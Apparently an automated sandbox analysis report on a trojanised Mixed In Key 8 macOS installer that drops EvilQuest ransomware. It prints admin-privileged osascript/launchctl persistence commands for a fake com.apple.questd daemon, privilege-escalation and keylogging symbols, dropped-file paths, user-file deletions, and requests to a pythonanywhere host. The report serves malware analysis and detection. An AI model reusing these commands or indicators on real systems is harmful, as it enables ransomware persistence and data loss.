        • security_authtrampoline (MD5: f55206da7dd9b6699ecb7e3e8ce994f7) Arguments: /usr/libexec/security_authtrampoline /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid auth 18 /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
        • uid (MD5: cb71c60e99e14478dede15b269f4517f) Arguments: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
        • uid (MD5: cb71c60e99e14478dede15b269f4517f) Arguments: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
        • sh (MD5: 348affb69862798fd7b2f8874437f649) Arguments: /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
          • sh New Fork (PID: 833, Parent: 832)
          • launchctl (MD5: 3e04cf4fe184467aa2dbf4e4d5c72f3d) Arguments: launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist
          • sh New Fork (PID: 834, Parent: 832)
          • launchctl (MD5: 3e04cf4fe184467aa2dbf4e4d5c72f3d) Arguments: launchctl start questd
      • sh New Fork (PID: 851, Parent: 768)
      • osascript (MD5: bec2959dde44c809741cf5069e08bf0f) Arguments: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
        • security_authtrampoline (MD5: f55206da7dd9b6699ecb7e3e8ce994f7) Arguments: /usr/libexec/security_authtrampoline /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid auth 20 /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
        • uid (MD5: cb71c60e99e14478dede15b269f4517f) Arguments: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
        • uid (MD5: cb71c60e99e14478dede15b269f4517f) Arguments: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
        • sh (MD5: 348affb69862798fd7b2f8874437f649) Arguments: /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
          • sh New Fork (PID: 853, Parent: 852)
          • launchctl (MD5: 3e04cf4fe184467aa2dbf4e4d5c72f3d) Arguments: launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist
          • sh New Fork (PID: 854, Parent: 852)
          • launchctl (MD5: 3e04cf4fe184467aa2dbf4e4d5c72f3d) Arguments: launchctl start questd
      • sh New Fork (PID: 855, Parent: 768)
      • osascript (MD5: bec2959dde44c809741cf5069e08bf0f) Arguments: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
        • security_authtrampoline (MD5: f55206da7dd9b6699ecb7e3e8ce994f7) Arguments: /usr/libexec/security_authtrampoline /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid auth 21 /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
        • uid (MD5: cb71c60e99e14478dede15b269f4517f) Arguments: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
        • uid (MD5: cb71c60e99e14478dede15b269f4517f) Arguments: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
        • sh (MD5: 348affb69862798fd7b2f8874437f649) Arguments: /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
          • sh New Fork (PID: 857, Parent: 856)
          • launchctl (MD5: 3e04cf4fe184467aa2dbf4e4d5c72f3d) Arguments: launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist
          • sh New Fork (PID: 858, Parent: 856)
          • launchctl (MD5: 3e04cf4fe184467aa2dbf4e4d5c72f3d) Arguments: launchctl start questd
      • sh New Fork (PID: 859, Parent: 768)
      • osascript (MD5: bec2959dde44c809741cf5069e08bf0f) Arguments: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
        • security_authtrampoline (MD5: f55206da7dd9b6699ecb7e3e8ce994f7) Arguments: /usr/libexec/security_authtrampoline /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid auth 21 /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
        • uid (MD5: cb71c60e99e14478dede15b269f4517f) Arguments: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
        • uid (MD5: cb71c60e99e14478dede15b269f4517f) Arguments: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
        • sh (MD5: 348affb69862798fd7b2f8874437f649) Arguments: /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
          • sh New Fork (PID: 861, Parent: 860)
          • launchctl (MD5: 3e04cf4fe184467aa2dbf4e4d5c72f3d) Arguments: launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist
          • sh New Fork (PID: 862, Parent: 860)
          • launchctl (MD5: 3e04cf4fe184467aa2dbf4e4d5c72f3d) Arguments: launchctl start questd
      • sh New Fork (PID: 863, Parent: 768)
      • osascript (MD5: bec2959dde44c809741cf5069e08bf0f) Arguments: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
        • security_authtrampoline (MD5: f55206da7dd9b6699ecb7e3e8ce994f7) Arguments: /usr/libexec/security_authtrampoline /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid auth 21 /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
        • uid (MD5: cb71c60e99e14478dede15b269f4517f) Arguments: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
        • uid (MD5: cb71c60e99e14478dede15b269f4517f) Arguments: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
        • sh (MD5: 348affb69862798fd7b2f8874437f649) Arguments: /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
          • sh New Fork (PID: 865, Parent: 864)
          • launchctl (MD5: 3e04cf4fe184467aa2dbf4e4d5c72f3d) Arguments: launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist
          • sh New Fork (PID: 866, Parent: 864)
          • launchctl (MD5: 3e04cf4fe184467aa2dbf4e4d5c72f3d) Arguments: launchctl start questd
      • sh New Fork (PID: 867, Parent: 768)
      • osascript (MD5: bec2959dde44c809741cf5069e08bf0f) Arguments: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
        • security_authtrampoline (MD5: f55206da7dd9b6699ecb7e3e8ce994f7) Arguments: /usr/libexec/security_authtrampoline /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid auth 21 /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
  • cleanup

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
patchJoeSecurity_EvilQuestYara detected EvilQuest RansomwareJoe Security

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Utils/.BC.T_5f8PkXJoeSecurity_EvilQuestYara detected EvilQuest RansomwareJoe Security
      /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Scripts/com.mixedinkey.installer.YPgB1A/Utils/.BC.T_qXDTh4JoeSecurity_EvilQuestYara detected EvilQuest RansomwareJoe Security
        /private/var/root/Library/.FNm8T2eKLJoeSecurity_EvilQuestYara detected EvilQuest RansomwareJoe Security
          dropped\.O6a3uE2h3JoeSecurity_EvilQuestYara detected EvilQuest RansomwareJoe Security
            /Users/ben/Library/.O6a3uE2h3JoeSecurity_EvilQuestYara detected EvilQuest RansomwareJoe Security
              Click to see the 4 entries

              Signature Overview

              Click to jump to signature section

              Show All Signature Results
              Source: submissionMach-O header: dylib_command -> /System/Library/Frameworks/Security.framework/Versions/A/Security
              Source: extracted file from submission .\Utils\patchMach-O symbol: _tpdcrypt
              Source: extracted file from submission .\Utils\patchMach-O symbol: _tpcrypt
              Source: extracted file from submission .\Utils\patchMach-O symbol: _eip_encrypt
              Source: extracted file from submission .\Utils\patchMach-O symbol: _eip_decrypt
              Source: extracted file from submission .\Utils\patchMach-O symbol: __generate_xkey
              Source: extracted file from submission .\Utils\patchMach-O symbol: __tp_decrypt
              Source: extracted file from submission .\Utils\patchMach-O symbol: __tp_encrypt

              Privilege Escalation:

              barindex
              Contains symbols with suspicious names likely related to privilege escalationShow sources
              Source: extracted file from submission .\Utils\patchMach-O symbol: _run_as_admin
              Source: extracted file from submission .\Utils\patchMach-O symbol: _run_as_admin_async
              Source: extracted file from submission .\Utils\patchMach-O symbol: _ei_rootgainer_main
              Source: extracted file from submission .\Utils\patchMach-O symbol: __ei_rootgainer_elevate
              Source: extracted file from submission .\Utils\patchMach-O symbol: _acquire_root
              Executes shell scripts with administrative rightsShow sources
              Source: /bin/sh (PID: 763)Osascript admin shell script: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
              Source: /bin/sh (PID: 769)Osascript admin shell script: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
              Source: /bin/sh (PID: 773)Osascript admin shell script: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
              Source: /bin/sh (PID: 777)Osascript admin shell script: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
              Source: /bin/sh (PID: 797)Osascript admin shell script: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
              Source: /bin/sh (PID: 801)Osascript admin shell script: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
              Source: /bin/sh (PID: 806)Osascript admin shell script: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
              Source: /bin/sh (PID: 822)Osascript admin shell script: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
              Source: /bin/sh (PID: 835)Osascript admin shell script: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
              Source: /bin/sh (PID: 781)Osascript admin shell script: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
              Source: /bin/sh (PID: 785)Osascript admin shell script: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
              Source: /bin/sh (PID: 789)Osascript admin shell script: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
              Source: /bin/sh (PID: 793)Osascript admin shell script: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
              Source: /bin/sh (PID: 805)Osascript admin shell script: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
              Source: /bin/sh (PID: 813)Osascript admin shell script: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
              Source: /bin/sh (PID: 831)Osascript admin shell script: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
              Source: /bin/sh (PID: 851)Osascript admin shell script: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
              Source: /bin/sh (PID: 855)Osascript admin shell script: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
              Source: /bin/sh (PID: 859)Osascript admin shell script: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
              Source: /bin/sh (PID: 863)Osascript admin shell script: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
              Source: /bin/sh (PID: 867)Osascript admin shell script: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
              Source: global trafficHTTP traffic detected: GET /ret.txt HTTP/1.0Host: andrewka6.pythonanywhere.com
              Source: global trafficHTTP traffic detected: GET /ret.txt HTTP/1.0Host: andrewka6.pythonanywhere.com
              Source: global trafficHTTP traffic detected: GET /ret.txt HTTP/1.0Host: andrewka6.pythonanywhere.com
              Source: global trafficHTTP traffic detected: GET /ret.txt HTTP/1.0Host: andrewka6.pythonanywhere.com
              Source: unknownTCP traffic detected without corresponding DNS query: 72.247.178.67
              Source: unknownTCP traffic detected without corresponding DNS query: 72.247.179.32
              Source: unknownTCP traffic detected without corresponding DNS query: 72.247.178.67
              Source: unknownTCP traffic detected without corresponding DNS query: 72.247.179.32
              Source: unknownTCP traffic detected without corresponding DNS query: 72.247.179.32
              Source: unknownTCP traffic detected without corresponding DNS query: 72.247.179.32
              Source: unknownTCP traffic detected without corresponding DNS query: 72.247.179.32
              Source: unknownTCP traffic detected without corresponding DNS query: 72.247.179.32
              Source: unknownTCP traffic detected without corresponding DNS query: 104.103.72.192
              Source: unknownTCP traffic detected without corresponding DNS query: 104.103.72.192
              Source: global trafficHTTP traffic detected: GET /ret.txt HTTP/1.0Host: andrewka6.pythonanywhere.com
              Source: global trafficHTTP traffic detected: GET /ret.txt HTTP/1.0Host: andrewka6.pythonanywhere.com
              Source: global trafficHTTP traffic detected: GET /ret.txt HTTP/1.0Host: andrewka6.pythonanywhere.com
              Source: global trafficHTTP traffic detected: GET /ret.txt HTTP/1.0Host: andrewka6.pythonanywhere.com
              Source: unknownDNS traffic detected: queries for: andrewka6.pythonanywhere.com
              Source: /Library/mixednkey/toolroomd (PID: 756)Reads from socket in process: dataJump to behavior
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Reads from socket in process: data
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 01 Jul 2020 12:19:35 GMTContent-Type: text/htmlContent-Length: 2921Connection: closeETag: "5ece92c1-b69"Server: PythonAnywhereData Raw: 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 43 6f 6d 69 6e 67 20 53 6f 6f 6e 3a 20 50 79 74 68 6f 6e 41 6e 79 77 68 65 72 65 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 48 65 6c 76 65 74 69 63 61 2c 20 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 35 30 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 54 72 65 62 75 63 68 65 74 20 4d 53 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 66 6f 72 2d 73 69 74 65 2d 6f 77 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 73 6d 61 6c 6c 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 67 72 61 79 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0a 0a 20 20 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 20 20 20 20 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 73 33 2e 61 6d 61 7a 6f 6e 61 77 73 2e 63 6f 6d 2f 70 79 74 68 6f 6e 61 6e 79 77 68 65 72 65 2d 65 72 72 6f 72 2d 69 6d 61 67 65 73 2f 6c 6f 67 6f 2d 32 33 34 78 33 35 2e 70 6e 67 22 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 31 3e 43 6f 6d 69 6e 67 20 53 6f 6f 6e 21 3c 2f 68 31 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 54 68 69 73 20 69 73 20 67 6f 69 6e 67 20 74 6f 20 62 65 20 61 6e 6f 74 68 65 72 20 67 72 65 61 74 20 77 65 62 73 69 74 65 20 68 6f 73 74 65 64 20 62 79 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 70 79 74 68 6f 6e 61 6e 79 77 68 65 72 65 2e 63 6f 6d 2f 22 3e 50 79 74 68 6f 6e 41 6e 79 77 68 65 72 65 3c 2f 61 3e 2e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 0a 20 20 20
              Source: .BC.T_16hDMO.311.drString found in binary or memory: http://crl.apple.com/root.crl0
              Source: .BC.T_16hDMO.311.drString found in binary or memory: http://crl.apple.com/timestamp.crl0
              Source: .BC.T_3B76ri.311.drString found in binary or memory: http://developer.kde.org/~wheeler/taglib/api/
              Source: Mixed In Key 8String found in binary or memory: http://flow8deck.com/?utm_source=mik8_mac&utm_medium=mac&utm_campaign=mik
              Source: Mixed In Key 8String found in binary or memory: http://mashup.mixedinkey.com/?utm_source=mik8_mac&utm_medium=mac&utm_campaign=mik
              Source: .BC.T_16hDMO.311.drString found in binary or memory: http://ocsp.apple.com/ocsp-devid010
              Source: Mixed In Key 8String found in binary or memory: http://odesi.mixedinkey.com/?utm_source=mik8_mac&utm_medium=mac&utm_campaign=mik
              Source: Mixed In Key 8String found in binary or memory: http://odesi.mixedinkey.com/?utm_source=mik8_mac&utm_medium=mac&utm_campaign=mikhttp://www.platinumn
              Source: .BC.T_6q2u9T.311.drString found in binary or memory: http://www.apache.org/licenses/
              Source: .BC.T_0gaPmY.311.dr, .BC.T_1AZHwU.311.dr, .BC.T_6q2u9T.311.dr, .BC.T_8YnpXO.311.dr, .BC.T_a5ogjE.311.drString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
              Source: .BC.T_0gaPmY.311.dr, .BC.T_1AZHwU.311.dr, .BC.T_8YnpXO.311.dr, .BC.T_a5ogjE.311.drString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0Copyright
              Source: .BC.T_0gaPmY.311.dr, .BC.T_8YnpXO.311.drString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0RobotoBlack
              Source: .BC.T_a5ogjE.311.drString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0RobotoLight
              Source: .BC.T_1AZHwU.311.drString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0RobotoMedium
              Source: Nt7gLoFlYn.dmgString found in binary or memory: http://www.apple.com/DTDs/PropertyList-1.0.dtd
              Source: .BC.T_16hDMO.311.drString found in binary or memory: http://www.apple.com/appleca0
              Source: .BC.T_3Hh3Nv.311.drString found in binary or memory: http://www.daemonology.net/bsdiff/
              Source: .BC.T_7YfcYl.311.drString found in binary or memory: http://www.mixedinkey.com/
              Source: Mixed In Key 8String found in binary or memory: http://www.mixedinkey.com/Book/?utm_source=mik8_mac&utm_medium=mac&utm_campaign=mik
              Source: .BC.T_0p2dhG.311.drString found in binary or memory: http://www.mozilla.org/MPL/
              Source: Mixed In Key 8String found in binary or memory: http://www.platinumnotes.com/?utm_source=mik8_mac&utm_medium=mac&utm_campaign=mik
              Source: Mixed In Key 8String found in binary or memory: http://www.platinumnotes.com/?utm_source=mik8_mac&utm_medium=mac&utm_campaign=mik8_mac
              Source: .BC.T_b1MPG3.311.drString found in binary or memory: https://community.mixedinkey.com
              Source: .BC.T_b1MPG3.311.drString found in binary or memory: https://community.mixedinkey.com/BlogPosts/Categories/News/
              Source: .BC.T_3B76ri.311.drString found in binary or memory: https://mikteam.atlassian.net/wiki/display/MT/How
              Source: .BC.T_b1MPG3.311.drString found in binary or memory: https://mixedinkey.com/master-collection/
              Source: Mixed In Key 8String found in binary or memory: https://mixedinkey.com/tutorials/mixed-in-key/abletonIntegration.html
              Source: Mixed In Key 8String found in binary or memory: https://mixedinkey.com/tutorials/mixed-in-key/abletonIntegration.htmlhttps://mixedinkey.com/tutorial
              Source: Mixed In Key 8String found in binary or memory: https://mixedinkey.com/tutorials/mixed-in-key/harmonicMixing101.html
              Source: Mixed In Key 8String found in binary or memory: https://mixedinkey.com/tutorials/mixed-in-key/iTunesIntegration.html
              Source: Mixed In Key 8String found in binary or memory: https://mixedinkey.com/tutorials/mixed-in-key/pioneerIntegration.html
              Source: Mixed In Key 8String found in binary or memory: https://mixedinkey.com/tutorials/mixed-in-key/seratoIntegration.html
              Source: Mixed In Key 8String found in binary or memory: https://mixedinkey.com/tutorials/mixed-in-key/startHere.html
              Source: Mixed In Key 8String found in binary or memory: https://mixedinkey.com/tutorials/mixed-in-key/traktorIntegration.html
              Source: .BC.T_7YfcYl.311.drString found in binary or memory: https://news.mixedinkey.com/api/news/channels/searchbyvipcode?vipCode=%
              Source: .BC.T_7YfcYl.311.drString found in binary or memory: https://news.mixedinkey.com/api/news/unreadcount?channels=%
              Source: .BC.T_7YfcYl.311.drString found in binary or memory: https://news.mixedinkey.com/news?theme=MIK&channels=%
              Source: Mixed In Key 8String found in binary or memory: https://online5.mixedinkey.com/Services/Analysis/AnalyzeSong
              Source: Mixed In Key 8String found in binary or memory: https://online5.mixedinkey.com/Services/License/CheckLicense
              Source: Info.plistString found in binary or memory: https://online5.mixedinkey.com/Services/UserFeedback/Feedback
              Source: .BC.T_7YfcYl.311.drString found in binary or memory: https://ssl.google-analytics.com/collect
              Source: .BC.T_7YfcYl.311.drString found in binary or memory: https://ssl.google-analytics.com/collectv=1&tid=%
              Source: .BC.T_b1MPG3.311.drString found in binary or memory: https://www.MixedInKey.com/PrivacyPolicy
              Source: .BC.T_b1MPG3.311.drString found in binary or memory: https://www.MixedInKey.com/downloads.aspx
              Source: .BC.T_16hDMO.311.drString found in binary or memory: https://www.apple.com/appleca/0
              Source: .BC.T_b1MPG3.311.drString found in binary or memory: https://www.google.com
              Source: Info.plistString found in binary or memory: https://www.mixedinkey.com
              Source: Info.plistString found in binary or memory: https://www.mixedinkey.com/BuyMacOSX.aspx?S=App
              Source: Info.plistString found in binary or memory: https://www.mixedinkey.com/DownloadMacOSX.aspx?Version=Original&VIP=%
              Source: Mixed In Key 8String found in binary or memory: https://www.mixedinkey.com/PrivacyPolicy
              Source: Info.plistString found in binary or memory: https://www.mixedinkey.com/recovery
              Source: unknownNetwork traffic detected: HTTP traffic on port 49185 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49186 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49186
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49185
              Source: /Library/mixednkey/toolroomd (PID: 756)Writes from socket in process: dataJump to behavior
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Writes from socket in process: data

              Key, Mouse, Clipboard, Microphone and Screen Capturing:

              barindex
              Contains functionality related to key loggingShow sources
              Source: extracted submission file .\Utils\patchMach-O symbol: _CGEventTapEnable
              Source: extracted submission file .\Utils\patchMach-O symbol: _CGEventTapCreate

              Spam, unwanted Advertisements and Ransom Demands:

              barindex
              Detected macOS EvilQuest ransomwareShow sources
              Source: /Library/mixednkey/toolroomd (PID: 756)IOC file dropped: /Library/AppQuest/com.apple.questdJump to dropped file
              Source: /Library/mixednkey/toolroomd (PID: 756)IOC file dropped: /Users/ben/Library/AppQuest/com.apple.questd
              Source: /Library/mixednkey/toolroomd (PID: 756)IOC file dropped: /Users/ben/Library/LaunchAgents/com.apple.questd.plistJump to dropped file
              Source: /Library/AppQuest/com.apple.questd (PID: 768)IOC file dropped: /private/var/root/Library/AppQuest/com.apple.questdJump to dropped file
              Source: /Library/AppQuest/com.apple.questd (PID: 768)IOC file dropped: /private/var/root/Library/LaunchAgents/com.apple.questd.plistJump to dropped file
              Source: /Library/AppQuest/com.apple.questd (PID: 768)IOC file dropped: /Users/ben/Library/AppQuest/com.apple.questdJump to dropped file
              Yara detected EvilQuest RansomwareShow sources
              Source: Yara matchFile source: patch, type: SAMPLE
              Source: Yara matchFile source: /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Utils/.BC.T_5f8PkX, type: DROPPED
              Source: Yara matchFile source: /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Scripts/com.mixedinkey.installer.YPgB1A/Utils/.BC.T_qXDTh4, type: DROPPED
              Source: Yara matchFile source: /private/var/root/Library/.FNm8T2eKL, type: DROPPED
              Source: Yara matchFile source: dropped\.O6a3uE2h3, type: DROPPED
              Source: Yara matchFile source: /Users/ben/Library/.O6a3uE2h3, type: DROPPED
              Source: Yara matchFile source: /Library/AppQuest/com.apple.questd, type: DROPPED
              Source: Yara matchFile source: /Users/ben/Library/AppQuest/com.apple.questd, type: DROPPED
              Source: Yara matchFile source: /Users/ben/Library/AppQuest/com.apple.questd, type: DROPPED
              Source: Yara matchFile source: /Library/AppQuest/com.apple.questd, type: DROPPED
              Deletes many files in the user directoryShow sources
              Source: /Library/mixednkey/toolroomd (PID: 756)User file deleted: /Users/ben/Desktop/Nt7gLoFlYn.dmgJump to behavior
              Source: /Library/AppQuest/com.apple.questd (PID: 768)User file deleted: /Users/ben/.CFUserTextEncoding
              Source: /Library/AppQuest/com.apple.questd (PID: 768)User file deleted: /Users/ben/.bash_sessions/EBE6D3A3-8F8E-4F5E-A314-627FCC8C6C15.historynew
              Source: /Library/AppQuest/com.apple.questd (PID: 768)User file deleted: /Users/ben/.bash_sessions/EBE6D3A3-8F8E-4F5E-A314-627FCC8C6C15.history
